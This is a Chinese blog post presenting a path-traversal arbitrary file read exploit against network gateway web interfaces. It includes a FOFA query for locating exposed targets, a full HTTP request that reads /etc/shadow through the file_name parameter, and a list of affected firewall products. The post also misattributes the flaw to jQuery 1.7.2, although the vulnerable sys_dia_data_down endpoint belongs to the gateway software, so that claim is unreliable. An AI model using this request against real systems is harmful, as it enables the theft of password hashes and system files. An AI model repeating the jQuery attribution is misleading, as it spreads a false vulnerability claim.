当前位置:   article > 正文

jQuery-1.7.2存在任意文件读取漏洞_jquery v1.7.2漏洞复现

jquery v1.7.2漏洞复现

jQuery是一个快速、简洁的JavaScript框架,是一个丰富的JavaScript代码库,其1.7.2版本的sys_dia_data_down模块存在任意文件读取漏洞,攻击者可通过前台读取任意文件。

1.漏洞级别

高危

2.漏洞搜索

fofa

body="webui/js/jquerylib/jquery-1.7.2.min.js"
  • 1

3.影响范围

jQuery-1.7.2
  • 1

4.漏洞复现

我们以使用该插件的安博通网关为例:
构造

GET /webui/?file_name=../../../../../etc/shadow&g=sys_dia_data_down HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: USGSESSID=ddc4875e875c49403c35ccfbcef07db1
Upgrade-Insecure-Requests: 1

  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10

返回内容即为文件内容:
在这里插入图片描述不难看出file_name就是控制文件路径的参数,我们可以简单的得出访问任意文件的构造访问

file_name=../../../../../etc/shadow. =/etc/shadow
file_name=../../../../../bin/bash  =/bin/bash
  • 1
  • 2

漏洞相对比较简单。

5.后话

因为jquery是个非常常用的插件,所以很多饮用该版本的系统都会存在漏洞,大量的网关系统就因此中招了,已知的就有这些。

    如:
    飞鱼星下一代防火墙安全网关;/任天行网络安全管理系统;等等很多很多。有兴趣大家可以自己找找看。
 
  • 1
  • 2
  • 3

后续还会随文章附赠一个简单的利用脚本,如果有问题欢迎随时沟通~
在这里插入图片描述

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/不正经/article/detail/695852
推荐阅读
相关标签
  

闽ICP备14008679号